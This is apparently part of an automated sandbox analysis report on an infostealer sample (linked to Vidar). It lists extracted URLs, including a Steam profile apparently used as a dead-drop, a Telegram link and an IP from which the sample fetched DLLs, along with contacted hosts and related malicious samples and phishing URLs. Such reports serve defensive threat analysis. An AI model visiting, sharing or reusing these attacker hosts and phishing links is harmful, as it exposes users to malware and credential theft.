https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://steamcommunity.com/profiles/76561199677575543/inventory/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://95.217.246.168/6.	RegAsm.exe, 00000002.00000002.2055946086.0000000001601000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://s.ytimg.com;	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue[1].dll.2.dr, mozglue.dll.2.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://mozilla.org0/	freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BFIDGHDB.2.dr	false		high
https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0	file.exe, 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp, ECBAEBGH.2.dr	false		high
https://www.ecosia.org/newtab/	BFIDGHDB.2.dr	false		high
https://www.youtube.com/	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199677575543[1].htm.2.dr	false		high
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://95.217.246.168/msvcp140.dllR	RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://95.217.246.168/sqln.dlluZqb.	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	ECBAEBGH.2.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://store.steampowered.com/about/	76561199677575543[1].htm.2.dr	false		high
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://t.me/snsb82At	file.exe, 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://steamcommunity.com/market/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://store.steampowered.com/news/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://95.217.246.168KJE	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://95.217.246.168/msvcp140.dll(	RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BFIDGHDB.2.dr	false		high
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp, ECBAEBGH.2.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://steamcommunity.com/discussions/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://steamcommunity.com/profiles/76561199677575543#	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://store.steampowered.com/steam_refunds/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=EL8P	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	ECBAEBGH.2.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BFIDGHDB.2.dr	false		high
https://steamcommunity.com/workshop/	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://store.steampowered.com/legal/	RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://t.me/snsb82	file.exe, file.exe, 00000000.00000002.1611372672.00000000009FE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.2.dr	false		high
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	76561199677575543[1].htm.2.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BFIDGHDB.2.dr	false		high
https://recaptcha.net	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/	76561199677575543[1].htm.2.dr	false		high
https://95.217.246.168/vcruntime140.dllF	RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe	RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	false		high
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=vQePc_kMURDk&l=e	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://ac.ecosia.org/autocomplete?q=	BFIDGHDB.2.dr	false		high
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://95.217.246.168FIE	RegAsm.exe, 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	RegAsm.exe, 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2055946086.0000000001589000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.2.dr	false		high
https://api.steampowered.com/	RegAsm.exe, 00000002.00000002.2055946086.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.194.234.100	steamcommunity.com	United States		16625	AKAMAI-ASUS	false
95.217.246.168	unknown	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432048
Start date and time:	2024-04-26 11:02:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/21@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 91 Number of non-executed functions: 208
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:02:58	API Interceptor	1x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.194.234.100	UJzMs6lsyF.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	7qAKRRMho6.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	8b3ee970a1b172952a665247aa5ff590d12d8f4b33c07.exe	Get hash	malicious	GCleaner, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
95.217.246.168	file.exe	Get hash	malicious	Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	n8XBpFdVFU.exe	Get hash	malicious	Babuk, Djvu, Vidar	Browse	96.17.209.196
	R5391762lf.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	23.66.133.162
	file.exe	Get hash	malicious	Vidar	Browse	96.17.209.196
	sIQywRNC5M.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	qJKiVKZdFk.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	23.65.44.84
	Z4CYGTBlj7.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	184.85.65.125
	SUwX12D2S6.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.66.133.162
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	23.66.133.162
	rq0mVjR9ar.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASUS	RemotePCHost.exe	Get hash	malicious	Unknown	Browse	184.31.62.93
	https://autode.sk/4bb5BeV	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.214.187.157
	aios3.exe	Get hash	malicious	Unknown	Browse	184.31.60.185
	http://email.wantyourfeedback.com/ls/click?upn=u001.PD4nPnyJUo8oiEzSkSGLgaBNAMtLp9U5nstWElDmnpXtySPOXSs4GxXhEZNYegDWlOpy_1gt1aDjd5mPVItYgazWgABkVm-2FZUH6kt1lIvkdtkRWsfoyQV18ixDvOX-2B0tU4ZH6SMN7PC0YJjM3gcvFPvh6CbZuFXlOBXf3FWLiJkpKJ7Hjba3S4-2FzhpmkR8VdprfK8GO3qSu-2BzqpIaLLC-2Bva9kOn7HY5B7OIgz5EOl88o1lnRSRpayTzqRzTSFhtg2Bi-2BI4dAZ7qHRbJ3vb9lcrxBKqAk13I-2BCAvndhSK1Vi4ubCjlp2xQlrXIHfzqmLiSPjl7tEmTsLYr99h3esBOPv8ASLIpf873P512I7xYEOjogT1gQCerfZNqh6K2IdWU6lDJ2r3wpU6ug02vU9Zslw4DYpuNNZQNVtap5mqv9Xf8D1PYQxYI5BK4owXOV2wEXeRIjST24XAw6EO9D1tdiGoHDRaxW2QofayefCuiW9Z191aML90svJWojHiQp1Fq-2BXFLiyEx8V1eLa7dixfJ23RRWtHvg1jOrHp7lqvXRA7dobs-3D	Get hash	malicious	HTMLPhisher	Browse	23.59.235.214
	dwn1cGHIbV.elf	Get hash	malicious	Mirai	Browse	104.73.199.214
	https://bushelman-my.sharepoint.com/:b:/p/lance/ESXtc6Laa05KpaC4W3rpMEMBfLSUU1GZhgfhBL8opRqFHg?e=Wrw3le	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.223.31.42
	[EXTERNAL] New file received.eml	Get hash	malicious	HTMLPhisher	Browse	23.47.176.131
	https://www.bing.com/////////////////////ck/a?!&&p=0533e94aab0b2a6eJmltdHM9MTcxMzQ4NDgwMCZpZ3VpZD0xNDE4NDZmNi1iZWY1LTY4NjUtMjQ0YS01MjkwYmYwZTY5ODQmaW5zaWQ9NTIyMA&ptn=3&ver=2&hsh=3&fclid=141846f6-bef5-6865-244a-5290bf0e6984&u=a1aHR0cHM6Ly9reDRrc3IuYXJ0aWNsZXdyaXRpbmdnZW5lcmF0b3IueHl6Lw#vds2aa29aYmRldmluc0B3ZS13b3JsZHdpZGUuY29t	Get hash	malicious	HTMLPhisher	Browse	23.209.84.186
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196
	https://app.frame.io/presentations/da0e116a-d15f-430f-8c37-0aa7d783720f?component_clicked=digest_call_to_action&email_id=8abc710c-c18f-47f5-a884-e927cb8dcfaa&email_type=pending-reviewer-invite	Get hash	malicious	HTMLPhisher	Browse	23.199.47.148
HETZNER-ASDE	http://www.tbmuae.com/	Get hash	malicious	GRQ Scam	Browse	136.243.216.235
	PHHOjspjmp.exe	Get hash	malicious	CMSBrute	Browse	95.216.154.139
	https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332	Get hash	malicious	Phisher	Browse	88.198.55.100
	https://url.us.m.mimecastprotect.com/s/qkT5Cv2pWyUOjZODty9fnF?domain=google.com	Get hash	malicious	Unknown	Browse	168.119.146.39
	https://colunroad.info/?utm_campaign=y0rsMyowMImIDv9DTSX69oig88PrjKrJ9agQ3DpV-9I1&t=back	Get hash	malicious	GRQ Scam	Browse	136.243.216.235
	http://www.mh3solaroh.com/	Get hash	malicious	HTMLPhisher	Browse	5.161.181.124
	https://starmicronics.com/support/download/starprnt-intelligence-software-setup-exe-file-v3-6-0a/#unlock	Get hash	malicious	Unknown	Browse	188.40.94.206
	16770075581.zip	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	148.251.133.229
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	https://btcpike.top	Get hash	malicious	Unknown	Browse	213.239.209.209

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
